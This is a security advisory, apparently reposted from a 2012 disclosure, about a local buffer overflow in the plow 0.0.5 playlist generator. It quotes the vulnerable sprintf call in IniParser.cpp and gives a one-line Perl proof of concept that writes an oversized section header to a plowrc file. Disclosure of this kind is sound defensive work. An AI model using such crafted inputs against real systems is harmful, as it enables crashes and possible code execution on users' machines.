plow 0.0.5 <= Buffer Overflow Vulnerability

2012.07.05
Credit: Jean Pascal Pereira
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

################################################# plow 0.0.5 <= Buffer Overflow Vulnerability ################################################# Discovered by: Jean Pascal Pereira <pereira () secbiz de> Vendor information: "plow is a command line playlist generator." Vendor URI: http://developer.berlios.de/projects/plow/ ################################################# Risk-level: Medium The application is prone to a local buffer overflow vulnerability. ------------------------------------- IniParser.cpp, line 26: 26: char buffer[length]; 27: char group [length]; 28: 29: char *option; 30: char *value; 31: 32: while(ini.getline(buffer, length)) { 33: if(!strlen(buffer) || buffer[0] == '#') { 34: continue; 35: } 36: if(buffer[0] == '[') { 37: if(buffer[strlen(buffer) - 1] == ']') { 38: sprintf(group, "%s", buffer); 39: } else { 40: err = 1; 41: break; 42: } 43: } ------------------------------------- Exploit / Proof Of Concept: Create a crafted plowrc file: perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc ------------------------------------- Solution: Do some input validation. ------------------------------------- #################################################

References:

http://developer.berlios.de/projects/plow/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top